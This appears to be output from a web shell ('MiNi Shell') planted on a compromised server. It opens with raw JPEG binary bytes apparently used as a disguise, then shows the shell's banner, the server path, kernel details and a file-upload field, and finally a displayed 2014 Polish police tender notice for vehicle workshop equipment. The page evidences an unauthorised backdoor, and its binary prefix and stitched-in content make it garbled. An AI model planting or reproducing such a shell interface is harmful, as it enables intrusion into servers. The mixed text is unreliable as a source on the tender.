JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140703/144145-N-2014.html

<p class="kh_header"><b>Radom: Dostawa wraz z montażem urządzeń i narzędzi warsztatowych dla potrzeb Stacji Obsługi Transportu w Płocku - nr postępowania 64/14</b><br>
<b>Numer ogłoszenia: 144145 - 2014; data zamieszczenia: 03.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji z siedzibą w Radomiu , ul. 11 Listopada 37/59, 26-600 Radom, woj. mazowieckie, tel. 48 3453103, faks 48 3452002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.mazowiecka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem urządzeń i narzędzi warsztatowych dla potrzeb Stacji Obsługi Transportu w Płocku - nr postępowania 64/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z montażem urządzeń i narzędzi warsztatowych na wyposażenie  Stacji Obsługi Transportu w Płocku - Szczegółowy opis techniczny urządzeń i narzędzi warsztatowych stanowi załącznik nr 1. 
Wykonawca zobowiązuje się dostarczyć urządzenia i narzędzia fabrycznie nowe, wolne od wad prawnych i fizycznych, zgodne z zaleceniami, normami i obowiązującymi wymaganiami techniczno - eksploatacyjnymi obowiązującymi  na terenie Rzeczypospolitej Polskiej. 
Wykonawca zobowiązany jest dostarczyć wraz z urządzeniami i narzędziami ich instrukcje obsługi 
w języku polskim.
Wszystkie urządzenia i narzędzia zaoferowane przez Wykonawcę muszą spełniać wszystkie wymagania określone przez Zamawiającego w załączniku nr 1.  
W ramach przedmiotu zamówienia Wykonawca zobowiązuje się do montażu oraz uruchomienia dostarczonych urządzeń, umożliwiających właściwą ich pracę.
Wykonawca przeprowadzi bezpłatny instruktaż personelu Zamawiającego. Instruktaż zostanie przeprowadzony w terminie do 14 dni od daty podpisania  protokołu odbioru. 
Wykonawca udziela na dostarczony asortyment gwarancji na okres wskazany w wykazie asortymentowo - ilościowym, licząc od dnia podpisania bez uwag protokołu odbioru.
Termin realizacji zamówienia wynosi 21 dni od dnia powiadomienia przez Zamawiającego 
o gotowości do montażu urządzeń jednak nie później niż do dnia 31.10.2014r.
Wykonawca zobowiązany jest do załączenia do oferty dla poz. 1,2,3,6,7,8, 14,15,16,19,21,22,23 dokumentów np. karty techniczne oferowanych urządzeń, z których wynikać będzie spełnianie przez nie warunków technicznych stawianych przez Zamawiającego a opisanych w załączniku nr 1.

Wymagany termin lub okres realizacji zamówienia: 21 dni od dnia powiadomienia przez Zamawiającego o gotowości do montażu urządzeń jednak nie później niż do dnia 31.10.2014r.. 

WYKAZ ASORTYMENTOWO - ILOŚCIOWY
1.Urządzenie do obsługi układów klimatyzacji samochodowych wraz z oprzyrządowaniem oraz urządzeniem do dezynfekowania metodą ozonowania.- 1;
2.Montażownia do kół samochodowych 13-23 z opcja ALU-1;
3.Wyważarka do kół samochodowych 13-23 - 1;
4. Urządzenie rozruchowe 12V - 1;
5.Podnośnik pneumatyczny udźwig 2,2 t -1;
6.Wanna wulkanizatorska - 1;
7.Dźwignik do demontażu skrzyni biegów- 2;
8.Stół warsztatowy - 4;
9.Podnośnik warsztatowy typu żaba 3 t - 4;
10.Zlewarko - wysysarka do oleju - 1;
11.Tester do sprawdzania nieszczelności cylindrów - 1;
12.Próbnik ciśnienia oleju-1;
13.Klucz dynamometryczny - 3;
14.Tester płynu hamulcowego - 2;
15. Prostownik 24/10- 1;
16.Prostownik 24/25- 1;
17.Podstawki samochodowe - 12;
18. Smarownica nożna- 1;
19.Zestaw do dystrybucji oleju - 4;
20.Zestaw do dystrybucji płynu chłodzącego-2;
21.Urządzenie do wymiany płynu w układzie hamulcowym -2;
22.Podnośnik pneumatyczny do wymiany opon-2;
23.Komputer diagnostyczny EOBD z diagnoskopem oraz oprzyrządowaniem i wykupiona aktualizacją oprogramowania na okres min. 3 lat-1;
24. Zestaw kluczy do filtrów oleju- 1;
25.Klucz pneumatyczny ? cal.-9;
26.Ściągacz do przegubów z półosi - 2;
27.Wózek serwisowy - 6;
28.Przewód spiralny powietrza -11;
29.Klucz dynamometryczny -1;
30. Ściągacz sprężyn zawieszenia- 1;
31.Ściągacz trójramienny-1;
32.Zestaw narzędzi do tłoczków hamulcowych-2;
33.Zestaw do korków spustowych-2;
34.Nitownica -2;
35.Grzechotka łamana -2;
36.Grzechotka łamana -2;
37.Grzechotka łamana-2;
38.Zestaw adapterów udarowych-9;
39.Zestaw nasadek do czujników-1;
40.Zestaw narzędzi do alternatora-1;
41.Lampa warsztatowa-11;
42.Lutownica transformatorowa-2;
43.Lutownica z regulacja temperatury-1;
44.Szkło powiększające-1;
45.Ściągacz do łożysk alternatora-1;
46.Zgrzewarka do szczotek alternatora-1;
47.Wiertarka elektryczna ręczna-2;
48.Szlifierka kątowa-2;
49.Szlifierka kątowa-1;
50.Ściągacz sprzęgiełek klimatyzacji-2;
51.Zestaw szczypiec do opasek zaciskowych-4;
52.Zestaw do szczelności głowic-1;
53.Palnik gazowy z wężem-1;
54.Ładowarka do akumulatorów motocyklowych-1;
55.Przyrząd do testowania wtryskiwaczy-1;
56.Imadło-3;
57.Zestaw wkrętaków udarowych-2;
58.Zestaw nasadek do świec-2;
59.Próbnik napięcia-4;
60.Zestaw ściągaczy do łożysk-1;
61.Inflator-1;
62.Młotek-10;
63.Miernik cyfrowy-1;
64.Przystawka cięgowa-1;
65.Ściągacz do przegubów-5;
66.Przyrząd do zarabiania końcówek hamulcowych-1;
67.Prasa hydrauliczno-pneumatyczna-1;
68.Zestaw do wyjmowania silników-2;
69.Podnośnik hydrauliczno - pneumatyczny-2;
70.Zestaw kluczy nasadowych-1;
71.Półautomat spawalniczy-1;
72.Blokada rozrządu-1;
73.Blokada rozrządu-1;
74.Blokada rozrządu-1;
75.Rozpierak do opon-1;
76.Szczypce wulkanizacyjne-2;
77.Pistolet do pompowania kół-2;
78.Wózek do przewozu kół-1;
79.Klucz nastawny wygięty-4;
80.Suwmiarka cyfrowa-2;
81.Opalarka-2;
82.Szczypce-1;
83.Gwintowniki-2;
84.Narzynki-2;
85.Kpl wierteł do stali-5;
86.Szlifierka stołowa-1;
87.Wiertarka stołowa-1;
88.Imadło do wtryskiwaczy-1;
89.zestaw narzędzi z młotkiem bezwładn.-1;
90.Wanna podłogowa-2;
91.Multimetr cyfrowy uniwersalny-2;
92.Komplet kluczy fajkowych-1;
93.Klucz pneumatyczny3/4 cal.-1;
94.Komplet kluczy płasko- oczkowych-3;
95.Komplet frezów do wtrysków-1;
96.Zestaw do podgrzewania propan- tlen z butlami i kpl oprzyrządowania-1;
97.Komplet kluczy 12-kątnych ? cal.-1;
98.Klucz udarowy kątowy-1;
99.Przyrząd do sprawdzania akumulatorów pod obciążeniem-1;
100.Zestaw do zakuwania łańcuchów motocyklowych-1;
101.Urządzenie do demontażu świec żarowych-2;
102.Ściągacz do końcówek drążków-1;
103.Ściągacz do sworzni-1;
104.Zestaw kluczy nasadowych ? i ? cal. (walizka)-2;
105.Zestaw nasadek udarowych ? cal. krótkich-6;
106.Zestaw nasadek udarowych ? cal. długich-6;
107.Nagrzewnica indukcyjna do odkręcania zapieczonych połączeń-2;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 43.80.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości  5000,00 zł.
Wadium musi być wniesione przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
w pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. 
Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 
49 1010 1010 0022 1913 9120 0000
Wadium wnoszone w pieniądzu należy wpłacić na konto podając w tytule przelewu numer postępowania przetargowego na które Wykonawca składa ofertę.
Wadium wnoszone w innej formie niż w pieniądzu należy składać w oryginale wraz z ofertą.  
W przypadku wpłat na konto za dotrzymanie terminu uważa się uznanie rachunku Zamawiającego.
Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony 
z postępowania, zgodnie z zapisem art. 24 ust 2 pkt 2 ustawy Prawo zamówień publicznych.UWAGA:
W treści wadium składanego w formie innej niż pieniądz muszą być wyszczególnione okoliczności, w jakich zamawiający może je zatrzymać. Okoliczności te muszą zawierać sytuacje określone:
1) w art. 46 ust. 4a prawa zamówień publicznych, tj. jeżeli wykonawca w odpowiedzi na wezwanie,
 o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw,
2) w art. 46 ust. 5 prawa zamówień publicznych, tj.: jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy. Poza tym z powyższego dokumentu powinno wynikać jednoznacznie, gwarantowanie wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert. Wadium w innej formie niż pieniądz należy złożyć w oryginale łącznie z ofertą, może być 
w oddzielnej kopercie.
Gwarant nie może uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub też od przedłożenia jakiejkolwiek dokumentacji.
WARUNKI ZWROTU WADIUM:
1. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4 a.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
2.  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
3.  Zamawiający zatrzymuje wadium  w okolicznościach i na zasadach o których mowa w art. 46 ustawy-Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.  Do oferty należy dołączyć oświadczenie  o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.  Do oferty należy dołączyć oświadczenie  o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.  Do oferty należy dołączyć oświadczenie  o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku.  Do oferty należy dołączyć oświadczenie  o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca zobowiązany jest do załączenia do oferty dla poz. 1,2,3,6,7,8, 14,15,16,19,21,22,23 dokumentów np. karty techniczne oferowanych urządzeń, z których wynikać będzie spełnianie przez nie warunków technicznych stawianych przez Zamawiającego a opisanych w załączniku nr 1.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)W przypadku polegania na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest udowodnić zmawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dysponowania niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie to winno zawierać sposób udostępnienia potencjału przez podmiot trzeci przy realizacji zamówienia. 2) W przypadku udzielenia pełnomocnictwa - oryginał pełnomocnictwa lub kopia poświadczona przez notariusza. 3) Wypełniony Formularz Ofertowy (zgodnie z załącznikiem do SIWZ). 4) Wypełniony Wykaz asortymentowo ilościowy stanowiącą integralną część Formularza Ofertowego. 5) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (w tym także w przypadku spółki cywilnej wymagane jest określenie pełnomocnika do ich reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oryginał pełnomocnictwa lub kopia poświadczona przez notariusza, z którego powinien wynikać zakres umocowania dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.6) Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  zmianę postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach i na określonych poniżej warunkach:
a)	Dopuszczalne jest obniżenie wynagrodzenia Wykonawcy przy zachowaniu zakresu jego świadczenia umownego;
b)	Dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy);
c)	Dopuszczalne jest zmiana terminu realizacji zamówienia w zakresie dostawy przedmiotu zamówienia z powodów  niezależnych od Wykonawcy.
 Zmiana umowy na wniosek Wykonawcy wymaga wykazania przez Wykonawcę
okoliczności uprawniających do dokonania tej zmiany;
d)	dopuszczalne są zmiany spowodowane zmianą wysokości obowiązujących stawek VAT dotyczących przedmiotu umowy w okresie obowiązywania umowy Zamawiający przewiduje zapłatę wynagrodzenia uwzględniającego obowiązującą stawkę VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mazowiecka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji zs. w Radomiu
ul. 11-go Listopada 37/59
26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu pokój 801 / 8- piętro/..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2014 godzina 09:00, miejsce: Komenda Wojewódzka Policji zs. w Radomiu
ul. 11-go Listopada 37/59
26-600 Radom
Sekcja Zamówień Publicznych KWP zs. w Radomiu pokój 801 / 8- piętro/..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com